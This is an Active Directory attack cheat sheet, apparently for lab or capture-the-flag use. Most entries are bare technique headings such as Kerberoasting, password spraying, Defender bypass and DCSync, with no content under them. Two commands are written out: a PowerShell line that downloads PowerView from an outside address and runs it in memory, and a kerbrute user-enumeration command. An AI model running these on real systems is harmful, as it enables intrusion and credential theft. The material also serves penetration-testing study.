AD Cheat Sheet
Download Execute PowerView In Memory
IEX(New-Object System.Net.WebClient).DownloadString("http://10.10.123.101:30000/PowerView.ps1")User Enumeration Kerbrute
./kerbrute userenum --dc 10.0.2.10 -d remo.htb users.txt
Kerberos Brute-force

ASREP Roasting

Exploiting Force Change Password
Targeted Kerberoasting Exploiting Generic Write
Kerberoasting

CrackMapExec RID BruteForce

CrackMapExec Password Spraying

RunAs Reverse Shell

Getting Arrow keys interactive shell

listing open port on windows machine

chisel port forwarding.

chisel on target machine
Brute Forcing RID using rpcclient

User And Password Spraying

resetting user password using smbpasswd

Port one-liner

python script to create combination for users
HTA Phishing

Checking the live hosts in internal network

MSD Evasion Using ScareCrow

Ping Live Hosts

Add Exception To Defender (Semi Bypass!)
Constrained Delegation

Getting Ligolo Ready

Starting Ligolo

Adding Users to interesting groups

Change password using rpc

Find Delegation From linux

Constrained Delegation Abuse

DCSync with ticket

Last updated